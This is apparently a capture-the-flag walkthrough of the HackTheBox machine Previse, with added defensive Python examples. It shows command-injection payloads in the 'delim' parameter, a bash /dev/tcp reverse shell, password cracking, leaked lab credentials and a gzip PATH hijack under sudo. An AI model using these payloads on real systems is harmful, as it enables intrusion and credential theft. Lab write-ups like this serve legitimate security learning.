
HackTheBox — Previse

Jan 26, 2022

We start with nmap to discover open ports and services.

Nmap Scan

nmap -sC -sV -oA previse 10.10.11.104

Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for 10.10.11.104
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two open ports, SSH on 22 and HTTP on 80, and neither version has any known serious vulnerabilities.

So let's enumerate the HTTP port.

Enumerating HTTP

Going to http://10.10.11.104 redirects us to http://10.10.11.104/login.php


The page ends with .php, so we know it's a PHP app; when we run a directory bruteforcer we therefore need to specify the .php extension.

I tried logging in with admin:admin and admin:password, and tried the simple login bypass test' or 1=1 -- -, but nothing worked.

So I launched gobuster with raft-medium-words.txt from SecLists:

gobuster dir -u http://10.10.11.104/ -w raft-medium-words.txt -t 100 -x php -b 404,403

When I try to access any of these files it redirects me to login.php. BUT when I intercept the response in the proxy before the browser follows the redirect, the status is 302 Found yet I can see the full content of the page.
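The behaviour above (a redirect whose body still carries the protected page) is what you get when server code sends a Location header but keeps executing; the usual server-side fix is to stop the script right after the header is sent (in PHP, calling exit directly after header()). The following is an added example, not code from the writeup or from the application: it parses captured HTTP responses and flags that pattern so the observation can be turned into a repeatable check. The two captured responses are constructed to show the shape of the defect, not copied from the target.

```python
"""Flag redirect responses that still render the protected page.

Added example (not part of the writeup or the application): a 3xx response
whose body contains the full page is the symptom of server code that emits
a Location header but continues executing. Parsing captured responses for
that pattern turns a proxy observation into a repeatable check.
"""
import re

# Markup that only a fully rendered page would contain.
CONTENT_MARKERS = re.compile(r"<(form|table|input|textarea|select)\b", re.I)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status code, header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def redirect_leaks_body(raw: bytes, min_body_len: int = 200) -> bool:
    """True when a 3xx redirect still carries page content in its body."""
    status, headers, body = parse_response(raw)
    if not 300 <= status < 400 or "location" not in headers:
        return False
    text = body.decode("utf-8", errors="replace")
    return len(text) >= min_body_len or CONTENT_MARKERS.search(text) is not None


def audit_responses(captures: dict) -> list:
    """Return the paths whose captured response leaks content past the redirect."""
    return [path for path, raw in captures.items() if redirect_leaks_body(raw)]


# Constructed captures: what a proxy would show for a protected page with
# and without the defect (shape only; not copied from any real host).
LEAKY_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: login.php\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><body><h1>Accounts</h1>"
    b"<form method=\"POST\" action=\"accounts.php\">"
    b"<input name=\"username\"><input name=\"password\">"
    b"<input name=\"confirm\"><input type=\"submit\"></form>"
    b"</body></html>"
)
CLEAN_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: login.php\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    captures = {"/accounts.php": LEAKY_RESPONSE, "/files.php": CLEAN_RESPONSE}
    for path, raw in captures.items():
        print(path, "LEAKS content past redirect" if redirect_leaks_body(raw) else "ok")
```

Feeding it the responses a proxy or a scripted crawl saved for every path found by the directory bruteforce gives a list of pages whose access control is only a browser-side redirect.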


Let's visit /accounts.php.


As you can see, we can create a new user by submitting the same data the form sends, so to create a new user we need to send a POST request to /accounts.php with the POST parameters username, password and confirm.


Now we have a new user embo1:embo1; let's log in with it.


And we are logged in. There is a SITEBACKUP.ZIP file and a user newguy on the FILES page; let's download the file.


As the file name says, it's a backup of the web site.


The config.php file contains the MySQL credentials:

root:mySQL_p@ssw0rd!:)

In logs.php, the POST parameter delim is passed directly to the exec function without any validation.


So we can intercept the request and send something like delim=space;whoami, but the output is not reflected in the response. Let's instead try to ping our machine (don't forget to URL-encode the payload):

delim=space;ping -c1 <Our IP>

and run tcpdump to capture it:

sudo tcpdump -n -i tun0 icmp
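The root cause is that delim is spliced into a command line. As an added example (not the application's logs.php and not from the writeup), the code below shows the defensive shape: the parameter is a key into a fixed table rather than a string that reaches a shell, the export is built in-process, and if a helper script really must be invoked it receives an argv list with no shell. It also includes a small log-review check that flags requests whose delim carries shell metacharacters, run over constructed access-log lines. The script path, the log rows and the client address are assumptions made for the example.

```python
"""Hardened handling of a user-chosen log delimiter, plus a log-review check.

Added example; not the application's logs.php. The writeup found that the
POST parameter delim is handed to exec() as-is. The safe pattern is to treat
the parameter as a key into a fixed table and never splice it into a shell
string; if an external tool is still needed, pass an argv list with no shell.
The script path, log rows and access-log lines below are constructed.
"""
import csv
import io
import re
from urllib.parse import parse_qs

# Only these names are accepted; the request never supplies the character itself.
ALLOWED_DELIMS = {"comma": ",", "space": " ", "tab": "\t"}

# Constructed rows standing in for the application's log table.
SAMPLE_ROWS = [
    ("2022-01-26 10:00:01", "m4lwhere", "login"),
    ("2022-01-26 10:02:17", "newguy", "upload"),
]


def is_allowed(param: str) -> bool:
    """Exact-match allowlist check; 'space;whoami' is simply not a key."""
    return param in ALLOWED_DELIMS


def resolve_delim(param: str) -> str:
    """Map the parameter to a delimiter or refuse the request."""
    if not is_allowed(param):
        raise ValueError(f"unsupported delimiter: {param!r}")
    return ALLOWED_DELIMS[param]


def export_logs(param: str, rows=SAMPLE_ROWS) -> str:
    """Build the export in-process: the delimiter is data and no process is spawned."""
    buf = io.StringIO()
    csv.writer(buf, delimiter=resolve_delim(param), lineterminator="\n").writerows(rows)
    return buf.getvalue()


def build_argv(param: str, script: str = "/path/to/log_export.py") -> list:
    """If a helper script must run, hand subprocess.run() an argv list like this,
    never a concatenated command line. The script path is a placeholder."""
    return ["/usr/bin/python3", script, resolve_delim(param)]


# Detection side: shell metacharacters in the delim parameter are never valid here.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")


def suspicious_delims(log_lines) -> list:
    """Return (line number, delim value) for requests whose delim carries shell syntax.
    Constructed line format: '<client ip> <method> <path> <url-encoded body>'."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[1] != "POST":
            continue
        for value in parse_qs(parts[3]).get("delim", []):
            if SHELL_META.search(value):
                hits.append((n, value))
    return hits


# Constructed log lines; the client address is made up for the example.
SAMPLE_LOG = [
    "10.10.14.5 POST /logs.php delim=comma",
    "10.10.14.5 POST /logs.php delim=space%3Bping+-c1+10.10.14.5",
    "10.10.14.5 GET /files.php -",
]

if __name__ == "__main__":
    print(export_logs("comma"), end="")
    print("flagged:", suspicious_delims(SAMPLE_LOG))
```

Because the allowlist is checked by exact key lookup, any value with extra characters is rejected before a delimiter is even chosen, which removes the need to escape anything.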


And we received an ICMP echo request, so we have command execution. Let's get a shell on the box.


Initial Foothold

Let's replace the ping command with a reverse shell and run a netcat listener:

delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'


We received a connection and we are on the box as www-data.

Getting User

After some enumeration I couldn't find anything, but remember the MySQL credentials we got before? Let's log in to MySQL using root:mySQL_p@ssw0rd!:)

I found an accounts table inside the previse database that contains the md5crypt hash of the user m4lwhere.

Let's save the hash to a file and crack it with hashcat or john:

hashcat -m 500 hash.txt rockyou.txt

OR

john hash.txt --wordlist=/opt/rockyou.txt --format=md5crypt

I use hashcat on my Windows host because it's much faster than john.

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

Now we have m4lwhere:ilovecody112235!, so let's SSH into the machine (or just use su m4lwhere).


Getting Root

Running sudo -l shows that we can run /opt/scripts/access_backup.sh as root.

Looking at the script, it runs gzip without specifying the full path, which means we can modify the $PATH variable so the lookup finds gzip in a directory where we have placed our own gzip script.


Let's create our gzip script in the /dev/shm/ directory and make it executable:

chmod +x gzip

Now modify the $PATH variable so it starts with the directory that contains our script.


Run a netcat listener:

nc -nvlp 1337

and run the script:

sudo /opt/scripts/access_backup.sh
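The privilege escalation works only because a script run as root resolves gzip through the caller's PATH. Where sudoers sets secure_path, sudo replaces PATH for the command it runs, but a script executed as root should still pin PATH itself and call tools by absolute path. The following is an added example, not the box's access_backup.sh (which the writeup shows only as an image): a small audit that lists the commands a shell script invokes by bare name and reports whether the script sets PATH. Both sample scripts are constructed for the example.

```python
"""Audit a script that runs under sudo for PATH-dependent command lookups.

Added example, not the box's own script (the writeup only shows it as an
image). A script executed as root must not resolve commands through the
caller's PATH; the audit below lists bare command names and checks whether
the script pins PATH itself. Both sample scripts are constructed.
"""
import re
import shlex

# Constructed stand-in for the vulnerable pattern described in the writeup.
SAMPLE_SCRIPT = """#!/bin/bash
# compress the access log into the backup directory
gzip -c /var/log/apache2/access.log > /var/backups/access.log.gz
/bin/chmod 640 /var/backups/access.log.gz
"""

# Same job with PATH pinned and every external command given by absolute path.
HARDENED_SCRIPT = """#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
/bin/gzip -c /var/log/apache2/access.log > /var/backups/access.log.gz
/bin/chmod 640 /var/backups/access.log.gz
"""

# Words that start a simple command but are builtins or keywords,
# so the shell never looks them up on PATH.
BUILTINS = {
    "cd", "echo", "export", "exit", "set", "umask", "read", "test", "[",
    "if", "then", "else", "elif", "fi", "for", "while", "do", "done",
    "local", "return", "shift", "trap", "true", "false",
}
ASSIGNMENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*=.*")
PATH_SET = re.compile(r"^\s*(export\s+)?PATH=")


def relative_commands(script: str) -> list:
    """Return command names the script invokes without an absolute path."""
    found = []
    for raw in script.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments (crude: ignores quoted '#')
        if not line:
            continue
        # Check each simple command in pipelines and command lists separately.
        for segment in re.split(r"\|\||&&|[|;]", line):
            try:
                words = shlex.split(segment)
            except ValueError:
                continue  # unbalanced quotes; skip this fragment
            while words and ASSIGNMENT.fullmatch(words[0]):
                words.pop(0)  # leading VAR=value assignments are not commands
            if not words:
                continue
            cmd = words[0]
            if cmd in BUILTINS or cmd.startswith(("/", "./")):
                continue
            if cmd not in found:
                found.append(cmd)
    return found


def sets_path(script: str) -> bool:
    """True if the script assigns PATH itself instead of trusting the caller's."""
    return any(PATH_SET.match(line) for line in script.splitlines())


def audit(script: str) -> dict:
    """Summarise the findings; 'safe' means no command depends on an inherited PATH."""
    bare = relative_commands(script)
    return {
        "relative_commands": bare,
        "sets_path": sets_path(script),
        "safe": not bare or sets_path(script),
    }


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_SCRIPT), ("hardened", HARDENED_SCRIPT)):
        print(name, audit(text))
```

Running this over every script granted through sudoers (sudo -l on each host lists them) surfaces the same class of issue before an attacker does; the comment stripping and tokenising are deliberately simple and will miss commands hidden inside quoted strings or subshells, so treat an empty result as a prompt to read the script rather than as proof.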

And we are ROOT!

If you find it useful, kindly give me a respect



Written by 0xEmbo

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.
